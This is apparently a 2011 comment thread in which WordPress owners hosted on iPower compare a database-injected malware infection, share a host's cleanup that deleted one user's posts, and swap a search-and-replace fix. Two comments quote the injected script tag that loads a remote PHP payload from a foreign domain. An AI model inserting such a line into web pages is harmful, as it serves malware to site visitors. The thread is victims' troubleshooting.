I did the updrage to the latest version now I have some strange code.

Well, glad you got it sorted but you should still run a firewall and one or two other security plugins.

Yeah I loaded the firewall too. Didn’t know that was necessary. I thought the hosting provider would handle that.

Had no idea, so thanks Jonas.. What other security plugins do you recommend?

i have the same problem guys, i run different wordpress blogs in my host and all of theme got infected with this male-ware code, i am also hosting my sites with ipower.com and the tech guys did not seem to have a solution yet, please if any one of you has solved this problem, show me how to do the same step by step, i have already installed firewall plugin but nothing changed.
this male-ware code seems to be new, the domain name it promotes is only one day old yet and it it’s servers are in lativa.

Well, they solved my problem, got rid of all the malware and took ALL of my blog posts and backups with it…

I now have a BLANK blog, 3 years of posts GONE (yes I know stupid me for not having a backup on my computer), so before you loose everything make sure you have a backup. I did nothing, they took care of the situation.

when i first told theme about this problem i asked to not take any action before the make sure i will not lose any data, then i started to backup all my sites, even i think the male-ware is still hidden in the backup itself, but i hope to find a solution without removing my site

So i have contacted Ipower and so far they have no idea. They tell me they can’t scan the site for me and that I will have to do it. If I freaking knew how to do that I wouldn’t need them. They should have things in place to prevent this type of attack anyway shouldn’t they?

i think the male-ware code came from their servers, all infected sites seems to be only with ipower

No idea?? I’m sure they have SOME idea since it seems like it’s their servers that got effected since it’s more than just 1 of us finding this out now…

Here’s what they originally told me:
We have found some SQL injection codes from your database and we have removed it. We suggest you to upload clean copy of your database back up from your local system.

Yea, they just removed EVERYTHING though so beware…. If your not getting online support CALL THEM!

I highly suggest if you have facebook to let IPOWER know whats going on on their page, I’m getting more help there than their support https://www.facebook.com/#!/ipower

Just did it. Great idea. Thanks.

coincidence? I do not think I’ve had this problem twice with PowWeb, ipower sister company, and since one day I have exactly the same attack on one of my wordpress web sites hosted on IPOWER.

My client’s site is another IPOWER hosted site with the <script src=”https://infoitpoweringgathering.com/ll.php?kk=11″></script&gt; script in the QuickPress section.

I opened up a page on the site and AVG popped up a malware warning. Here are the details.

“5/17/2011, 3:21:14 PM”;”NT AUTHORITY\SYSTEM”;”IDP”;”Process OS_PACK107_2129[1].EXE was detected.”

I’ve been on the phone with IPOWER support with no success. I’ll post if I find a solution.

I am with Ipower as well. So obviously their databases have been hacked somehow. I also installed the firewall and <script src=”https://infoitpoweringgathering.com/ll.php?kk=11″></script&gt; is still there. It happened on all of my WP blogs I am hosting, which is about 6 or so.

I’ve just fixed my 12 sites now, i tried a solution and it seems to work so far, i downloaded my mysql file and did search & replace.
open your mysql file with a text editor like notepad++ and search the male-ware code and put a “space” in the replace field then click replace all, save your file and go to your mysql admin and drop the old database and import the new one you modified
done.